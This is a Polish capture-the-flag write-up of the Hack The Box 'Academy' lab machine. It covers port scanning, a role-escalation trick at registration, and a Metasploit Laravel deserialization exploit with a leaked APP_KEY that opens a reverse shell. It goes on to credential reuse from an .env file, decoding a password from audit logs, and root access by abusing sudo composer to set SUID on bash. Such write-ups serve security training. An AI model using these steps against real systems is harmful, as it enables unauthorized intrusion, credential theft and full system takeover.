Nmap
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 63
80/tcp open http syn-ack ttl 63
User
Rejestrując użytkownika musimy przechwycić ruch i zmienić ciało zapytania POST “roleid” z 0 na 1
uid=test&password=test&confirm=test&roleid=1
Na utworzonym koncie logujemy się na http://academy.htb/admin.php

Następnie trzeba dodać wpis dev-staging-01.academy.htb do /etc/hosts
Widać dane do shella na stronie

Z tymi danymi używamy metasploita i dostajemy Shell’a
use unix/http/laravel_token_unserialize_exec
set APP_KEY dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0=
set RHOSTS 10.10.10.215
set RPORT 80
set SSL false
set TARGETURI /
set VHOST dev-staging-01.academy.htb
set LHOST tun0
run
w pliku /var/www/html/academy/.env mamy dane do logowania na użytkownika cry0l1t3
DB_CONNECTION=mysql
DB_HOST=127.0.0.1
DB_PORT=3306
DB_DATABASE=academy
DB_USERNAME=dev
DB_PASSWORD=mySup3rP4s5w0rd!!
cry0l1t3 : mySup3rP4s5w0rd!!
ssh cry0l1t3@10.10.10.215
python3 -c 'import pty;pty.spawn("/bin/bash");'
mamy usera
cat user.txt
d72c36088b27***831e4f6203ae02c
Root
Widzimy, że user jest w grupie adm więc dobrym tropem jest przejrzenie logów.
I znajdujemy hasło na użytkownika mrb3n w /var/log/audit/audit.log
DRUGI SPOSÓB
Można bezpośrednio użyć auditd do odczytania logów – pomijamy problem z hasłem w postaci HEX
type=TTY msg=audit(1597199290.086:83): tty pid=2517 uid=1002 auid=0 ses=1 major=4 minor=1 comm="sh" data=7375206D7262336E0A
type=TTY msg=audit(1597199293.906:84): tty pid=2520 uid=1002 auid=0 ses=1 major=4 minor=1 comm="su" data=6D7262336E5F41634064336D79210A
Hasło okazuje się w HEX’ach trzeba je zdekodować
mrb3n : mrb3n_Ac@d3my!
su mrb3n
Sprawdzamy uprawnienia sudo
mrb3n@academy:~$ sudo -l
[sudo] password for mrb3n:
Matching Defaults entries for mrb3n on academy:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User mrb3n may run the following commands on academy:
(ALL) /usr/bin/composer
Mamy instrukcję na internecie co można zrobić z tym composerem
Sprowadza się to do stworzenia pliku JSON i uruchomienie go z SUDO
{
"scripts": {
"test": [
"@clearCache",
"phpunit"
],
"clearCache": "chmod u+s /bin/bash"
}
}
sudo /usr/bin/composer clearCache
/bin/bash -p
bash-5.0# cat root.txt
0f41ca36f***37156befd5c09ba287